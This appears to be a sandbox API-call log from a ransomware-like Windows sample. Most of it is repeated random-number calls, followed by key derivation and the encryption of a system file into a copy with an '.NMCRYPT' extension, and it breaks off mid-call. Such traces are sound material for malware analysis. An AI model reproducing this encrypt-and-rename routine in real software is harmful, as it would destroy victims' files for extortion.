1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.083] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.083] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.084] CryptCreateHash (in: hProv=0x8e3908, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0148.084] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.084] CryptDeriveKey (in: hProv=0x8e3908, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad3b8) returned 1 [0148.084] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.084] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.084] wcslen (_String="\\\\?\\") returned 0x4 [0148.084] CryptDuplicateKey (in: hKey=0x9ad3b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad378) returned 1 [0148.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.085] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.086] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0148.086] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.087] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.129] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.129] GetLastError () returned 0x0 [0148.129] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.180] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.181] CryptEncrypt (in: hKey=0x9ad378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, 